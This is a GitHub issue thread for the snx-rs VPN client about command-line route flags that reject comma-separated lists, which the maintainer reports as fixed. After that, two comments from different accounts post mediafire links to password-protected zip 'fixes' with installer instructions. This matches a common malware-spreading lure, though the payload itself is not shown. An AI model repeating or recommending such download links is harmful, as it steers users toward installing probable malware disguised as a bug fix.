### ISSUE TITLE
Command line parameters --add-routes and --ignore-routes do not accept multiple routes

### ISSUE THREAD

**Issue by tGecko** [ancwrd1/snx-rs#38]
The command line parameters `--add-routes` and `--ignore-routes` do not accept specifying multiple comma separated routes:

```
thomas@fedora:~/code/snx-rs$ sudo target/debug/snx-rs -s=vpn.REDACTED.de --cert-type=pkcs12 --cert-path /home/thomas/REDACTED/thomas.REDACTED@REDACTED.de.pfx --cert-password $(cat /home/thomas/REDACTED/pw.txt) --login-type=vpn_Personal_Certificate_PKI -l=debug --ignore-routes=195.243.129.174/32,195.243.129.180/32
error: invalid value '195.243.129.174/32,195.243.129.180/32' for '--ignore-routes <IGNORE_ROUTES>': invalid IP address syntax

For more information, try '--help'.
```

It does accept single ones, and through the GUI it does also accept multiple entries.
I'd attempt to fix it, but I'm even more unfamiliar with the pest parser than with Rust itself 😅

**Comment by ancwrd1** [comment]
Should be working now.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
